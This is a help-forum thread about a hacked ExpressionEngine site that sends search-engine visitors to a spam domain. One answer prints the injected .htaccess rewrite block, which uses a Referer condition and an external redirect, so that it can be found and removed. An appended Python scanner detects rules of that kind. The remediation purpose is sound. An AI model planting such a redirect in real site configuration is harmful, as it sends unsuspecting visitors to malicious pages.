Reputation: 1186
I have an Expression Engine website that I am trying to clean up. The database has been given many new users, so it seems the database has been hacked / links added. One major issue is that the site, when clicked in Google, is being bypassed. All visitors are being redirected to another website. Here is the search: http://tinyurl.com/72nzutj . The first site is the one in question. The site they are redirected to is http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 I have been trying to find this redirect in all files and the database, but I have had no luck. It is not a .htaccess redirect; that I have checked and confirmed. But I have not been able to locate a JScript or PHP redirect in the files nor database as of yet. Probably well hidden because of a base64 or packed encryption. Ideas?
NB no clean database version available
Upvotes: 1
Views: 1068
Reputation: 9116
The redirects are happening from a compromise to your site's .htaccess file, and are only affecting clickthrus from popular search engines. Accessing the site directly has no effect, and helps keep the malware from being detected.
Look for the following code in your site's directory and remove it:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
You may need to view "hidden files" in your FTP client or use ls -al from the command line to view your .htaccess file.
After you've got the problem fixed, you'll want to make sure you're running the most recent version of ExpressionEngine (EE 1.7.1 or EE 2.3.1 as of this writing), as well as any third-party Add-Ons.
Auditing your server's access_logs may help identify the vulnerability that led to the compromise, as may looking at the modification timestamps on the files in your website directory.
A variant of this attack has already affected many WordPress installations, whereby a tiny base64_encoded JavaScript snippet was added just before the closing </body> tag, which led to visitors being served a malware-infected Adobe Flash Player download.
Upvotes: 1
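An added example, not part of the original answer: a small Python scanner that walks a web root, including subdirectories and hidden files, and reports every .htaccess RewriteRule that is conditioned on the Referer header and redirects to an external host, which is the pattern quoted in the answer above. The function names and the own_hosts value (www.example.org) are assumptions for illustration; SAMPLE is constructed from the snippet in the answer.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample: the injected block quoted in the answer above.
SAMPLE = r'''<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
'''

REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
ANY_COND = re.compile(r'^\s*RewriteCond\b', re.I)
ANY_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)

def scan_htaccess_text(text, own_hosts=()):
    """Return (line_no, referer_pattern, target) for every RewriteRule that is
    gated on the Referer header and redirects to a host not in own_hosts."""
    findings, referer = [], None
    for no, line in enumerate(text.splitlines(), 1):
        cond = REFERER_COND.match(line)
        if cond:
            referer = cond.group(1)      # remember until the next RewriteRule
        elif ANY_COND.match(line):
            continue                     # other conditions chain onto the same rule
        else:
            rule = ANY_RULE.match(line)
            if not rule:
                continue                 # comments, other directives, blank lines
            host = (urlparse(rule.group(1)).hostname or '').lower()
            if referer and host and host not in own_hosts:
                findings.append((no, referer, rule.group(1)))
            referer = None               # conditions apply only to the next rule
    return findings

def scan_tree(root, own_hosts=()):
    """Walk root (hidden files included) and scan every .htaccess found."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                found = scan_htaccess_text(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits

if __name__ == '__main__':
    # own_hosts is an assumed placeholder; list the site's real hostnames.
    print(scan_tree('.', own_hosts={'www.example.org'}))
```

Hotlink-protection rules (Referer condition with a `-` target) and canonical-host redirects (no Referer condition) are not reported, so a hit is worth reviewing by hand alongside the file's modification time.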
Reputation: 1479
Ask your web host. It seems that incoming visitors with a referrer other than the site are redirected but pasting your website (no referrer) directly into the location bar works.
This question is better off at ServerFault or ITSecurity.
Upvotes: 1